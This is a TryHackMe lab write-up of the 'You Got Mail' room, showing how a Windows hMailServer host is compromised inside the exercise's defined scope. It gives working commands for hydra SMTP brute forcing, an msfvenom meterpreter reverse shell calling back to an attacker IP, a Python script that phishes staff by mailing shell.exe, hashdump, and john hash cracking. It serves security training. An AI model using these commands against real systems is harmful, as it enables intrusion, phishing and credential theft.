You Got Mail (THM)

Test your recon and phishing skills in order to complete your objective.

into.

Welcome everyone today i want to go through this Try Hack Me machine its name is quite interesting i do not like Windows machine often but this one seems interesting let's dive into it.

Port scanning.


PORT      STATE SERVICE       REASON  VERSION
25/tcp    open  smtp          syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp   open  pop3          syn-ack hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
143/tcp   open  imap          syn-ack hMailServer imapd
|_imap-capabilities: QUOTA CHILDREN SORT RIGHTS=texkA0001 CAPABILITY OK IDLE completed IMAP4 ACL IMAP4rev1 NAMESPACE
445/tcp   open  microsoft-ds? syn-ack
587/tcp   open  smtp          syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-02-20T03:30:16
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 41825/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 56260/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 64713/udp): CLEAN (Failed to receive data)
|   Check 4 (port 56873/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:

Look like typical windows machine unless it has SMTP, and POP3 which both are used for emails.

The website.

So in the machine instruction we can see that there is a domain assign to us to enumerate. But passively.

You are a penetration tester who has recently been requested to perform a security assessment for Brik. You are permitted to perform active assessments on MACHINE_IP and strictly passive reconnaissance on brownbrick.co. The scope includes only the domain and IP provided and does not include other TLDs.

in the website there is nothing interesting but these emails and names. I tried to preform some OSINT on these people but nothing i came with.

You Got Mail | Writeups0xb0b.gitbook.io

Then i check Mr. Bob walk-through to understand that we can use cewl which is a tool used for gathering password list from a website. You can check more here.

GitHub - digininja/CeWL: CeWL is a Custom Word List GeneratorGitHub

To get the password list.

cewl --lowercase https://brownbrick.co/ > passwords.txt

using hydra we can brute force the emails we find hoping to get something

hydra -L ./possiableUsers -P ./passwords.txt gotmail.thm smtp -t 20 -V -I

And as you can see we get valid credential now we can send some emails using sendEmail.

But first we need some sort of payload to get shell on the target system i used msfvenom to generate that but you can use what ever you want as long as its exe file.

Generate the reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.96.110 LPORT=8888 -f exe -o shell.exe

setting metasploit to accept the connection.

msfconsole

use multi/handler
set lhost <your interface name>
set lport <port from the msfvenom>
set payload windows/meterpreter/reverse_tcp
exploit

i used this python code to automate the sending process for all the emails.

import subprocess

emails = "oaurelius@brownbrick.co tchikondi@brownbrick.co pcathrine@brownbrick.co stamatis@brownbrick.co wrohit@brownbrick.co"
email_list = emails.split(" ")

for i in email_list:
    cmd = f'sendEmail -f "lhedvig@brownbrick.co" -t {i} -u "test" -m "test" -a shell.exe -s 10.10.156.238:25 -xu "lhedvig@brownbrick.co" -xp "bricks"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    print(f"Email sent to: {i}, Output: {result.stdout}, Error: {result.stderr}")

once we run this and make sure it sending the emails successfully we now wait for the connection.

Now we can navigate to the home of the user wrohit.

Wrohit password.

from out same meterperter session we can use hashdump to get the ntlm hashes.

Let's crack it with john.

john --wordlist=../../Downloads/rockyou.txt ./hashes --format=nt

Administrator password.

Lastly it ask us about the Administrator dashboard password.

This one quite simple searching a bit there are two interesting files for hMailServer.

C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini

Here they are the first one should contain the database and the second one shall contain basic configuration.

From one of them we gonna file the admin password and using john we can crack it.

Conclusion.

At the end this machine was fun and really easy the fishing simulation is so good and good practice i would say 🤝.

PreviousRabbit Store (THM)NextDecryptify (THM)

Last updated 11 months ago

hashtaginto.

hashtagPort scanning.

hashtagThe website.

hashtagWrohit password.

hashtagAdministrator password.

hashtagConclusion.